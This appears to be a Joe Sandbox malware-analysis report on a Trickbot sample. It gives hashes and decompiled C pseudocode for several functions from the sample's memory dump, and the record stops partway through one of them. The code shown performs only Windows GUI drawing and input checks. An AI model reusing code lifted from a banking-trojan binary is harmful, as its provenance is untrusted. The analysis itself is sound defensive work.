Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
API String ID: 1233821986-3277416593
Opcode ID: 936facdebb5b3183a78c24582e98603c3e87f0bab6ca2ab8b0ff706ea7038536
Instruction ID: 2ea084c32dfb33befc72acde89e1a674d5dc18157d6bc8c5c63fc4487b2fbb62
Opcode Fuzzy Hash: 936facdebb5b3183a78c24582e98603c3e87f0bab6ca2ab8b0ff706ea7038536
Instruction Fuzzy Hash: A1417179B40240ABE710AFA9EC46BA677A4BB85750F140437ED00973E1DBFC5885CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0042FBCD, Relevance: 42.5, APIs: 28, Instructions: 479
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0042FBCD(intOrPtr __ecx) {
				int _t231;
				void* _t239;
				int _t240;
				void* _t260;
				void* _t267;
				void* _t268;
				CHAR* _t280;
				signed int _t336;
				int _t392;
				CHAR* _t407;
				signed int _t408;
				signed int _t409;
				int _t420;
				struct tagSIZE* _t421;
				int _t428;
				signed int _t437;
				int _t442;
				signed int _t446;
				void* _t447;
				int _t453;
				void* _t456;
				intOrPtr _t461;

				E00405340(E004387B0, _t456);
				_t461 =  *0x44b35c; // 0x1
				 *((intOrPtr*)(_t456 - 0x50)) = __ecx;
				if(_t461 == 0) {
					_push(__ecx);
					E004215AA(_t456 - 0x44, __eflags);
					 *(_t456 - 4) = 0;
					 *(_t456 - 0x30) = E0041B66F(__ecx);
					GetWindowRect( *(__ecx + 0x1c), _t456 - 0x28);
					OffsetRect(_t456 - 0x28,  ~( *(_t456 - 0x28)),  ~( *(_t456 - 0x24)));
					 *((intOrPtr*)(_t456 - 0x48)) = 0;
					 *((intOrPtr*)(_t456 - 0x4c)) = 0x43bd94;
					 *(_t456 - 4) = 1;
					E0042179E(_t456 - 0x4c, CreateSolidBrush(GetSysColor(6)));
					 *(_t456 - 0x5c) =  *(_t456 - 0x5c) & 0x00000000;
					 *((intOrPtr*)(_t456 - 0x60)) = 0x43bd94;
					 *(_t456 - 4) = 2;
					asm("sbb eax, eax");
					E0042179E(_t456 - 0x60, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 0xb)));
					 *(_t456 - 0x54) =  *(_t456 - 0x54) & 0x00000000;
					 *(_t456 - 0x58) = 0x43bd94;
					 *(_t456 - 4) = 3;
					asm("sbb eax, eax");
					E0042179E(_t456 - 0x58, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 3)));
					 *(_t456 - 0x10) = GetSystemMetrics(6);
					 *(_t456 - 0x14) = GetSystemMetrics(5);
					_t428 = GetSystemMetrics(0x21);
					_t231 = GetSystemMetrics(0x20);
					__eflags =  *(_t456 - 0x30) & 0x00040600;
					_t442 = _t231;
					if(( *(_t456 - 0x30) & 0x00040600) != 0) {
						E0042FB10(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						InflateRect(_t456 - 0x28,  ~( *(_t456 - 0x14)),  ~( *(_t456 - 0x10)));
						E0042FB10(_t456 - 0x44, _t456 - 0x28, _t442 -  *(_t456 - 0x14), _t428 -  *(_t456 - 0x10), _t456 - 0x60);
						_t407 =  &(( *(_t456 - 0x10))[ *(_t456 - 0x10)]);
						 *(_t456 - 0x74) = _t407;
						_t408 =  *(_t456 - 0x14);
						 *(_t456 - 0x18) = _t428 - _t407;
						_t336 = _t442 - _t408 + _t408;
						__eflags =  *(_t456 - 0x2f) & 0x00000002;
						 *(_t456 - 0x2c) = _t336;
						if(( *(_t456 - 0x2f) & 0x00000002) != 0) {
							_t409 =  *(_t456 - 0x18);
						} else {
							_t436 = _t428 -  *(_t456 - 0x74) +  *0x44b72c;
							_t455 = _t442 - _t408 + _t408 * 2 +  *0x44b728;
							E0042CAE1(_t456 - 0x44,  *(_t456 - 0x28),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x44b72c, _t336, 1, 0);
							E0042CAE1(_t456 - 0x44,  *(_t456 - 0x28),  *((intOrPtr*)(_t456 - 0x1c)) - _t428 -  *(_t456 - 0x74) +  *0x44b72c,  *(_t456 - 0x2c), 1, 0);
							E0042CAE1(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x44b72c,  *(_t456 - 0x2c), 1, 0);
							E0042CAE1(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *((intOrPtr*)(_t456 - 0x1c)) - _t436,  *(_t456 - 0x2c), 1, 0);
							_t437 =  *(_t456 - 0x18);
							E0042CAE1(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x44b728,  *(_t456 - 0x24), 1, _t437, 0);
							E0042CAE1(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t442 - _t408 + _t408 * 2 +  *0x44b728,  *(_t456 - 0x24), 1, _t437, 0);
							E0042CAE1(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x44b728,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							E0042CAE1(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t455,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							_t336 =  *(_t456 - 0x2c);
							_t409 = _t437;
						}
						InflateRect(_t456 - 0x28,  ~_t336,  ~_t409);
					}
					__eflags =  *(_t456 - 0x2e) & 0x000000c0;
					if(( *(_t456 - 0x2e) & 0x000000c0) == 0) {
						E0042FB10(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						goto L25;
					} else {
						asm("movsd");
						asm("movsd");
						_t240 =  *0x44b72c; // 0x0
						asm("movsd");
						asm("movsd");
						_t446 =  *(_t456 - 0x10);
						 *(_t456 - 0x64) = _t240 + _t446 +  *(_t456 - 0x24);
						E0042FB10(_t456 - 0x44, _t456 - 0x70,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						InflateRect(_t456 - 0x70,  ~( *(_t456 - 0x14)),  ~_t446);
						asm("sbb eax, eax");
						FillRect( *(_t456 - 0x40), _t456 - 0x70,  ~(_t456 - 0x58) &  *(_t456 - 0x54));
						E0042FB10(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
						_t260 =  *0x44b730; // 0x0
						__eflags = _t260;
						if(_t260 != 0) {
							 *(_t456 - 0x18) = SelectObject( *(_t456 - 0x40), _t260);
							_t280 =  *0x447478; // 0x44748c
							 *(_t456 - 0x10) = _t280;
							 *(_t456 - 4) = 4;
							E004191FC( *((intOrPtr*)(_t456 - 0x50)), _t456 - 0x10);
							_t421 = _t456 - 0x78;
							asm("sbb esi, esi");
							_t453 = ( ~( *(_t456 - 0x30) & 0x00080000) &  *0x44b728) +  *(_t456 - 0x70);
							GetTextExtentPoint32A( *(_t456 - 0x3c),  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), _t421);
							__eflags =  *(_t456 - 0x78) -  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70);
							if( *(_t456 - 0x78) <=  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70)) {
								E004213CD(_t456 - 0x44, 6);
								asm("cdq");
								_t453 = _t453 + ( *((intOrPtr*)(_t456 - 0x68)) - _t453 - _t421 >> 1);
								__eflags = _t453;
							}
							GetTextMetricsA( *(_t456 - 0x3c), _t456 - 0xb8);
							InflateRect(_t456 - 0x70, 0, 1);
							asm("cdq");
							asm("sbb eax, eax");
							E00420FEF(GetSysColor(( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) & 0x000000f6) + 0x13), _t456 - 0x44, _t302);
							E00420F37(_t456 - 0x44, 1);
							ExtTextOutA( *(_t456 - 0x40), _t453,  *((intOrPtr*)(_t456 - 0x6c)) + ( *(_t456 - 0x64) -  *((intOrPtr*)(_t456 - 0xac)) +  *((intOrPtr*)(_t456 - 0xb0)) +  *((intOrPtr*)(_t456 - 0xb4)) -  *((intOrPtr*)(_t456 - 0x6c)) + 1 - _t421 >> 1), 4, _t456 - 0x70,  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), 0);
							__eflags =  *(_t456 - 0x18);
							if( *(_t456 - 0x18) != 0) {
								SelectObject( *(_t456 - 0x40),  *(_t456 - 0x18));
							}
							 *(_t456 - 4) = 3;
							E00417EC8(_t456 - 0x10);
						}
						__eflags =  *(_t456 - 0x2e) & 0x00000008;
						if(( *(_t456 - 0x2e) & 0x00000008) == 0) {
							L23:
							 *(_t456 - 0x24) =  *(_t456 - 0x64);
							L25:
							 *(_t456 - 0x58) = 0x43aed4;
							 *(_t456 - 4) = 9;
							E004217F5(_t456 - 0x58);
							 *((intOrPtr*)(_t456 - 0x60)) = 0x43aed4;
							 *(_t456 - 4) = 0xa;
							E004217F5(_t456 - 0x60);
							 *((intOrPtr*)(_t456 - 0x4c)) = 0x43aed4;
							 *(_t456 - 4) = 0xb;
						} else {
							E00420CA4(_t456 - 0x80);
							 *(_t456 - 4) = 5;
							asm("sbb eax, eax");
							_t267 = E00420D5B(_t456 - 0x80, CreateCompatibleDC( ~(_t456 - 0x44) &  *(_t456 - 0x40)));
							__eflags = _t267;
							if(_t267 != 0) {
								_t268 =  *0x44b734; // 0x0
								__eflags = _t268;
								if(_t268 == 0) {
									_t447 = 0;
									__eflags = 0;
								} else {
									_t447 = SelectObject( *(_t456 - 0x7c), _t268);
								}
								_t392 =  *0x44b72c; // 0x0
								_t420 =  *0x44b728; // 0x0
								asm("sbb eax, eax");
								BitBlt( *(_t456 - 0x40),  *(_t456 - 0x28),  *(_t456 - 0x24), _t420, _t392,  ~(_t456 - 0x80) &  *(_t456 - 0x7c), 0, 0, 0xcc0020);
								__eflags = _t447;
								if(_t447 != 0) {
									SelectObject( *(_t456 - 0x7c), _t447);
								}
								 *(_t456 - 4) = 3;
								E00420DC3(_t456 - 0x80);
								goto L23;
							} else {
								 *(_t456 - 4) = 3;
								E00420DC3(_t456 - 0x80);
								 *(_t456 - 0x58) = 0x43aed4;
								 *(_t456 - 4) = 6;
								E004217F5(_t456 - 0x58);
								 *((intOrPtr*)(_t456 - 0x60)) = 0x43aed4;
								 *(_t456 - 4) = 7;
								E004217F5(_t456 - 0x60);
								 *((intOrPtr*)(_t456 - 0x4c)) = 0x43aed4;
								 *(_t456 - 4) = 8;
							}
						}
					}
					E004217F5(_t456 - 0x4c);
					_t197 = _t456 - 4;
					 *_t197 =  *(_t456 - 4) | 0xffffffff;
					__eflags =  *_t197;
					_t239 = E0042161C(_t456 - 0x44,  *_t197);
				} else {
					_t239 = E004187B4(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t456 - 0xc));
				return _t239;
			}

0x0042fbd2
0x0042fbe2
0x0042fbea
0x0042fbed
0x0042fbf9
0x0042fbfd
0x0042fc04
0x0042fc0c
0x0042fc16
0x0042fc2c
0x0042fc32
0x0042fc3a
0x0042fc45
0x0042fc58
0x0042fc5d
0x0042fc61
0x0042fc67
0x0042fc73
0x0042fc82
0x0042fc87
0x0042fc8b
0x0042fc91
0x0042fc9d
0x0042fcac
0x0042fcbd
0x0042fcc4
0x0042fccb
0x0042fccd
0x0042fccf
0x0042fcd6
0x0042fcd8
0x0042fcf0
0x0042fd05
0x0042fd23
0x0042fd2b
0x0042fd30
0x0042fd35
0x0042fd38
0x0042fd42
0x0042fd44
0x0042fd48
0x0042fd4b
0x0042fe33
0x0042fd51
0x0042fd59
0x0042fd69
0x0042fd76
0x0042fd8e
0x0042fdaa
0x0042fdc6
0x0042fdcb
0x0042fddf
0x0042fdf5
0x0042fe0e
0x0042fe27
0x0042fe2c
0x0042fe2f
0x0042fe2f
0x0042fe40
0x0042fe40
0x0042fe46
0x0042fe4a
0x004300d5
0x00000000
0x0042fe50
0x0042fe56
0x0042fe57
0x0042fe58
0x0042fe5d
0x0042fe5e
0x0042fe5f
0x0042fe67
0x0042fe7a
0x0042fe8e
0x0042fe99
0x0042fea6
0x0042febc
0x0042fec1
0x0042fec6
0x0042fec8
0x0042fed8
0x0042fedb
0x0042fee0
0x0042feea
0x0042feee
0x0042feff
0x0042ff08
0x0042ff15
0x0042ff18
0x0042ff24
0x0042ff27
0x0042ff2e
0x0042ff38
0x0042ff3d
0x0042ff3d
0x0042ff3d
0x0042ff49
0x0042ff6c
0x0042ff7b
0x0042ff8d
0x0042ff9b
0x0042ffa5
0x0042ffc4
0x0042ffca
0x0042ffce
0x0042ffd6
0x0042ffd6
0x0042ffdf
0x0042ffe3
0x0042ffe3
0x0042ffe8
0x0042ffec
0x004300bb
0x004300be
0x004300da
0x004300df
0x004300e5
0x004300e9
0x004300ee
0x004300f4
0x004300f8
0x004300fd
0x00430100
0x0042fff2
0x0042fff5
0x0042fffd
0x00430003
0x00430013
0x00430018
0x0043001a
0x00430057
0x0043005c
0x0043005e
0x0043006e
0x0043006e
0x00430060
0x0043006a
0x0043006a
0x00430070
0x00430079
0x00430086
0x0043009b
0x004300a1
0x004300a3
0x004300a9
0x004300a9
0x004300b2
0x004300b6
0x00000000
0x0043001c
0x0043001f
0x00430023
0x0043002d
0x00430033
0x00430037
0x0043003c
0x00430042
0x00430046
0x0043004b
0x0043004e
0x0043004e
0x0043001a
0x0042ffec
0x00430107
0x0043010c
0x0043010c
0x0043010c
0x00430113
0x0042fbef
0x0042fbef
0x0042fbef
0x0043011e
0x00430126

APIs

__EH_prolog.LIBCMT ref: 0042FBD2
GetWindowRect.USER32(?,?), ref: 0042FC16
OffsetRect.USER32(?,?,?), ref: 0042FC2C
GetSysColor.USER32(00000006), ref: 0042FC49
CreateSolidBrush.GDI32(00000000), ref: 0042FC52
GetSysColor.USER32(?), ref: 0042FC79
CreateSolidBrush.GDI32(00000000), ref: 0042FC7C
GetSysColor.USER32(?), ref: 0042FCA3
CreateSolidBrush.GDI32(00000000), ref: 0042FCA6
GetSystemMetrics.USER32(00000006), ref: 0042FCB9
GetSystemMetrics.USER32(00000005), ref: 0042FCC0
GetSystemMetrics.USER32(00000021), ref: 0042FCC7
GetSystemMetrics.USER32(00000020), ref: 0042FCCD
InflateRect.USER32(?,?,?), ref: 0042FD05

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
String ID:
API String ID: 1266645593-0
Opcode ID: 4689771b32c3087699ca03e68ee5b9b3cbbc650c2f83a260c541ee0f497bb8dd
Instruction ID: 378bfe11a02023979f4e8295d435f0813c0490739259c6a0dfd4c2398b2b0c15
Opcode Fuzzy Hash: 4689771b32c3087699ca03e68ee5b9b3cbbc650c2f83a260c541ee0f497bb8dd
Instruction Fuzzy Hash: 17022972E00219AFDF11DBE4DD49EEEBBB9EF48304F14412AE501B7291DB74AA05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00412410, Relevance: 37.8, APIs: 25, Instructions: 294
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00412410(void* __eflags) {
				void* _t113;
				void* _t121;
				intOrPtr _t142;
				struct tagRECT _t144;
				int _t147;
				struct tagRECT _t158;
				intOrPtr _t160;
				long _t161;
				void* _t163;
				struct tagRECT* _t178;
				signed int _t180;
				int _t182;
				CHAR* _t183;
				long* _t184;
				intOrPtr _t194;
				struct tagRECT _t195;
				struct tagRECT _t198;
				intOrPtr _t199;
				int _t206;
				RECT* _t209;
				struct HDC__* _t210;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;

				_t184 = _t214 + 0xc;
				_t209 =  *(_t214 + 0x34);
				_t180 = _t209->right;
				_push(0xf);
				_push(7);
				 *_t184 = _t209->left;
				_t210 =  *(_t214 + 0x40);
				_t184[1] = _t209->top;
				_t184[2] = _t180;
				_t184[3] = _t209->bottom;
				E00410920(_t210, _t209, 7);
				_t215 = _t214 + 0x14;
				InflateRect(_t214 + 0x30, 0xffffffff, 0xffffffff);
				if( *((short*)(_t215 + 0x44)) == 1 && IsWindowEnabled( *(_t215 + 0x30)) != 0) {
					_push(0xf);
					_push(7);
					E00410920(_t210, _t215 + 0x1c, 7);
					_t178 = _t215 + 0x30;
					_t215 = _t215 + 0x14;
					InflateRect(_t178, 0xffffffff, 0xffffffff);
				}
				PatBlt(_t210, _t209->left, _t209->top, 1, 1, 0xf00021);
				PatBlt(_t210, _t209->right - 1, _t209->top, 1, 1, 0xf00021);
				PatBlt(_t210,  *_t209, _t209->bottom - 1, 1, 1, 0xf00021);
				PatBlt(_t210, _t209->right - 1, _t209->bottom - 1, 1, 1, 0xf00021);
				asm("sbb ebx, ebx");
				_t182 =  ~_t180 + 1;
				if( *((intOrPtr*)(_t215 + 0x48)) == 0) {
					_t113 =  *0x44d384; // 0x0
				} else {
					_t113 =  *0x44d38c; // 0x0
				}
				 *((intOrPtr*)(_t215 + 0x14)) = SelectObject(_t210, _t113);
				PatBlt(_t210,  *(_t215 + 0x20),  *(_t215 + 0x20), _t182,  *((intOrPtr*)(_t215 + 0x2c)) -  *(_t215 + 0x24), 0xf00021);
				PatBlt(_t210,  *(_t215 + 0x28),  *(_t215 + 0x28),  *(_t215 + 0x24) -  *(_t215 + 0x20), _t182, 0xf00021);
				if( *((intOrPtr*)(_t215 + 0x48)) == 0) {
					_t163 =  *0x44d38c; // 0x0
					_t213 = 0;
					SelectObject(_t210, _t163);
					 *(_t215 + 0x28) =  *(_t215 + 0x28) - 1;
					 *(_t215 + 0x24) =  *(_t215 + 0x24) - 1;
					if(_t182 > 0) {
						do {
							PatBlt(_t210,  *(_t215 + 0x24),  *(_t215 + 0x30),  *(_t215 + 0x24) -  *(_t215 + 0x20) + 1, 1, 0xf00021);
							PatBlt(_t210,  *(_t215 + 0x28),  *(_t215 + 0x24), 1,  *(_t215 + 0x28) -  *(_t215 + 0x24), 0xf00021);
							if(_t182 - 1 > _t213) {
								InflateRect(_t215 + 0x1c, 0xffffffff, 0xffffffff);
							}
							_t213 = _t213 + 1;
						} while (_t182 > _t213);
					}
				}
				_t121 =  *0x44d388; // 0x0
				 *(_t215 + 0x1c) =  *(_t215 + 0x1c) + 1;
				 *(_t215 + 0x20) =  *(_t215 + 0x20) + 1;
				SelectObject(_t210, _t121);
				_t206 =  *(_t215 + 0x20);
				PatBlt(_t210, _t206,  *(_t215 + 0x24),  *((intOrPtr*)(_t215 + 0x2c)) -  *(_t215 + 0x24),  *(_t215 + 0x28) -  *(_t215 + 0x24), 0xf00021);
				if(IsWindowEnabled( *(_t215 + 0x30)) == 0) {
					_t161 =  *0x44d37c; // 0x0
					SetTextColor(_t210, _t161);
				}
				_t183 =  *(_t215 + 0x3c);
				_push(_t215 + 0x18);
				_push(_t215 + 0x14);
				E00410B10(_t210, _t183);
				_t216 = _t215 + 0x10;
				asm("cdq");
				 *((intOrPtr*)(_t216 + 0x20)) =  *((intOrPtr*)(_t216 + 0x20)) + ( *((intOrPtr*)(_t215 + 0x38)) -  *(_t215 + 0x30) -  *(_t215 + 0x28) - _t206 >> 1);
				_t194 =  *((intOrPtr*)(_t216 + 0x28));
				asm("cdq");
				 *(_t216 + 0x1c) =  *(_t216 + 0x1c) + ( *(_t216 + 0x24) -  *(_t216 + 0x1c) -  *((intOrPtr*)(_t216 + 0x14)) - _t206 >> 1);
				_t142 =  *((intOrPtr*)(_t216 + 0x20)) +  *((intOrPtr*)(_t216 + 0x18));
				if(_t142 >= _t194) {
					_t142 = _t194;
				}
				_t195 =  *(_t216 + 0x24);
				 *((intOrPtr*)(_t216 + 0x28)) = _t142;
				_t144 =  *(_t216 + 0x1c) +  *((intOrPtr*)(_t216 + 0x14));
				if(_t144 >= _t195) {
					_t144 = _t195;
				}
				 *(_t216 + 0x24) = _t144;
				if( *((intOrPtr*)(_t216 + 0x48)) != 0) {
					OffsetRect(_t216 + 0x1c, 1, 1);
					_t198 =  *(_t216 + 0x24);
					_t158 = _t209->right - 3;
					if(_t158 >= _t198) {
						_t158 = _t198;
					}
					_t199 =  *((intOrPtr*)(_t216 + 0x28));
					 *(_t216 + 0x24) = _t158;
					_t160 = _t209->bottom - 3;
					if(_t160 >= _t199) {
						_t160 = _t199;
					}
					 *((intOrPtr*)(_t216 + 0x28)) = _t160;
				}
				DrawTextA(_t210, _t183,  *(_t216 + 0x44), _t216 + 0x1c, 0x20);
				_t147 = GetFocus();
				if(_t147 ==  *((intOrPtr*)(_t216 + 0x30))) {
					InflateRect(_t216 + 0x1c, 1, 1);
					IntersectRect(_t216 + 0x24, _t216 + 0x1c, _t209);
					_t147 = DrawFocusRect(_t210, _t216 + 0x1c);
				}
				if( *(_t216 + 0x10) != 0) {
					return SelectObject(_t210,  *(_t216 + 0x10));
				}
				return _t147;
			}

0x00412413
0x0041241a
0x00412424
0x00412427
0x00412429
0x0041242b
0x00412432
0x00412438
0x0041243b
0x0041243e
0x00412441
0x0041244a
0x00412452
0x0041245e
0x00412473
0x00412475
0x0041247b
0x00412480
0x00412484
0x0041248c
0x0041248c
0x004124a3
0x004124bc
0x004124d4
0x004124ee
0x004124f9
0x004124fd
0x00412503
0x0041250c
0x00412505
0x00412505
0x00412505
0x00412526
0x00412537
0x00412557
0x00412562
0x00412564
0x00412569
0x0041256d
0x00412573
0x00412577
0x0041257d
0x0041257f
0x0041259b
0x004125bc
0x004125c7
0x004125d2
0x004125d2
0x004125d8
0x004125d9
0x0041257f
0x0041257d
0x004125dd
0x004125e2
0x004125e6
0x004125ec
0x00412603
0x00412614
0x00412627
0x00412629
0x00412630
0x00412630
0x0041263e
0x00412642
0x00412643
0x00412646
0x00412657
0x0041265a
0x00412660
0x00412670
0x00412674
0x0041267a
0x00412682
0x00412688
0x0041268a
0x0041268a
0x0041268c
0x00412690
0x00412698
0x0041269e
0x004126a0
0x004126a0
0x004126a7
0x004126ab
0x004126bc
0x004126c1
0x004126c5
0x004126ca
0x004126cc
0x004126cc
0x004126ce
0x004126d2
0x004126d9
0x004126de
0x004126e0
0x004126e0
0x004126e2
0x004126e2
0x004126f4
0x00412700
0x00412706
0x00412711
0x00412722
0x0041272e
0x0041272e
0x00412739
0x00000000
0x00412741
0x0041274e

APIs

Part of subcall function 00410920: SetBkColor.GDI32(?), ref: 0041093D
Part of subcall function 00410920: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041098A
Part of subcall function 00410920: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004109B9
Part of subcall function 00410920: SetBkColor.GDI32(?,?), ref: 004109D7
Part of subcall function 00410920: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00410A02
Part of subcall function 00410920: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00410A3C

InflateRect.USER32(?,000000FF,000000FF), ref: 00412452
IsWindowEnabled.USER32(?), ref: 00412465
InflateRect.USER32(?,000000FF,000000FF), ref: 0041248C
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124A3
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124BC
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124D4
PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124EE
SelectObject.GDI32(?,00000000), ref: 00412513
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00412537
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00412557
SelectObject.GDI32(?,00000000), ref: 0041256D
PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 0041259B
PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 004125BC
InflateRect.USER32(?,000000FF,000000FF), ref: 004125D2
SelectObject.GDI32(?,00000000), ref: 004125EC
PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 00412614
IsWindowEnabled.USER32(?), ref: 0041261F
SetTextColor.GDI32(?,00000000), ref: 00412630
OffsetRect.USER32(?,00000001,00000001), ref: 004126BC

Part of subcall function 00410920: SetBkColor.GDI32(?,00000000), ref: 00410A44

DrawTextA.USER32(?,?,?,?,00000020), ref: 004126F4
GetFocus.USER32 ref: 00412700
InflateRect.USER32(?,00000001,00000001), ref: 00412711
IntersectRect.USER32(?,?,?), ref: 00412722
DrawFocusRect.USER32(?,?), ref: 0041272E
SelectObject.GDI32(?,00000000), ref: 00412741

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
String ID:
API String ID: 1611134597-0
Opcode ID: f1fd01c642f9ca1cdb40d07b6b56d57805dc4f67ea3434bc45107149a5c7695c
Instruction ID: 3959cfea75d29f1a651bd1824b073a1cdf01660b6b1f7102ba69d51d9cf7d654
Opcode Fuzzy Hash: f1fd01c642f9ca1cdb40d07b6b56d57805dc4f67ea3434bc45107149a5c7695c
Instruction Fuzzy Hash: D6B12771208206AFD704CF58CD89EABB7E8FB88714F004A1DF559D2290D7B5ED85CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00416422, Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00416422(signed int __ecx) {
				signed int _t116;
				signed int _t119;
				signed int _t120;
				struct HWND__* _t124;
				signed int _t126;
				intOrPtr _t127;
				signed char _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				void* _t160;
				intOrPtr* _t167;
				signed int _t169;
				signed int _t182;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t198;
				void* _t200;
				signed short _t208;
				intOrPtr _t211;
				void* _t215;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t116 = E00405340(E00438AF5, _t215);
				_t218 = _t217 - 0x74;
				_t167 =  *((intOrPtr*)(_t215 + 8));
				_t208 =  *(_t167 + 4);
				_t198 = __ecx;
				 *(_t215 - 0x10) = __ecx;
				 *(_t215 - 0x1c) = _t208;
				if(_t208 == 0x200 || _t208 == 0xa0 || _t208 == 0x202 || _t208 == 0x205 || _t208 == 0x208) {
					_t116 = GetKeyState(1);
					if(_t116 < 0) {
						L49:
						_t208 =  *(_t215 - 0x1c);
						goto L50;
					}
					_t116 = GetKeyState(2);
					if(_t116 < 0) {
						goto L49;
					}
					_t116 = GetKeyState(4);
					if(_t116 < 0) {
						goto L49;
					} else {
						_push( *_t167);
						L9:
						_t116 = E0041884D(_t215);
						if(_t116 != 0 && ( *(_t116 + 0x24) & 0x00000401) == 0) {
							_push(GetParent( *(_t116 + 0x1c)));
							goto L9;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							_t211 = E00432D4E(0x44b2ec, E00430506);
							 *((intOrPtr*)(_t215 - 0x18)) = _t211;
							_t169 =  *(_t211 + 0xcc);
							_t119 = E00419E25(_t198);
							__eflags = _t169;
							 *(_t215 - 0x14) = _t119;
							if(_t169 == 0) {
								L19:
								_t120 = E0041BDEB(0x58);
								 *(_t215 - 0x1c) = _t120;
								_t169 = 0;
								__eflags = _t120;
								 *(_t215 - 4) = 0;
								if(__eflags != 0) {
									_t169 = E004160BF(_t120);
								}
								 *(_t215 - 4) =  *(_t215 - 4) | 0xffffffff;
								_push(1);
								_t116 = E00416114(_t169, __eflags,  *(_t215 - 0x14));
								__eflags = _t116;
								if(_t116 != 0) {
									SendMessageA( *(_t169 + 0x1c), 0x401, 0, 0);
									_t198 =  *(_t215 - 0x10);
									 *(_t211 + 0xcc) = _t169;
									L25:
									E00405360(_t215 - 0x54, 0, 0x2c);
									_t124 =  *(_t198 + 0x1c);
									_t220 = _t218 + 0xc;
									 *(_t215 - 0x4c) = _t124;
									 *(_t215 - 0x48) = _t124;
									 *(_t215 - 0x54) = 0x28;
